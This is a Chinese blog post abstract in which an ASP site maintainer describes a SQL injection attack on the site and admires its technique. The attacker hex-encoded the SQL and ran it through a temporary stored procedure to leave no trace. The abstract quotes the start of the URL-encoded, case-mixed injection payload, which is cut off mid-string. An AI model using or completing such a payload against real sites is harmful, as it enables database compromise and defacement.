摘要： 最近维护一个ASP网站，发现其被SQL注入，和往常的SQL注入不同的是他居然吧SQL语句编译成了二进制，然后再执行SQL写一个存储过程，然后再执行，最后删除存储过程，让你无际可循。说实话，我很佩服现在的黑客，如果可以我也想学学，这是怎么写出来的。。呵呵 下面是他执行的SQL的源码dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F43757 阅读全文